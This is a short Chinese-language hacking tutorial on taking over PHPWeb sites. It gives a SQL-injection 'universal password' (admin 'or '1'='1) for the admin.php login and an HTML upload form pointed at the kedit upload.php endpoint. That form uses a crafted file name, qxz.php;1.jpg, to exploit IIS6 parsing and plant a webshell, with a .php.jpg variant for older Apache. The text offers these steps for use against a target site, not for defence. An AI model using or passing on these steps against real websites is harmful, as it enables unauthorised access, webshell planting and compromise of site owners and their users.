首先登录后台admin.php(默认后台admin.php)

有的phpweb网站存在万能密码登录

帐号密码都输入：admin 'or '1'='1直接登录

登录后台管理系统后，然后把下面的文件保存为xxx.html，修改action，把www.xxx.com 改成你的目标网站地址。 

<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php"> 
<input type="text" name="fileName" value="qxz.php;1.jpg" /> 
<input type="hidden" name="attachPath" value="news/pics/" /> 
<input type="file" name="fileData" size="14" /></td> 
<input type="submit" name="button" value="确定" /> 
</form>

然后选择你的马儿再上传

上传后如果为iis6，就点击查看源码就可以找到马儿的路径了。

PS：qxz.php;1.jpg这样的文件是允许上传的，只要服务器是IIS6就拿到webshell，低版本的apache可以试着重命名为qxz.php.jpg